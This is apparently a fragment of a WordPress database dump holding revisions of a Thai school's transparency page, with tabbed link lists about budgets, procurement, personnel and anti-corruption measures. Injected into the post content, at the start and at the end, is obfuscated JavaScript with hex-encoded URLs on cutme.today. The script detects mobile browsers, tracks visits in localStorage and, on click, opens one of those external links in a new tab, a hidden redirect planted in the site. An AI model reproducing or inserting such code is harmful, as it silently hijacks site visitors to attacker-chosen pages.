_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 09:22:39','2025-07-01 02:22:39','',871,'http://pakhaeng.ssk.in.th/?p=1492',0,'revision','',0),
(1494,1,'2025-07-01 09:23:23','2025-07-01 02:23:23','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":4,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-4 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 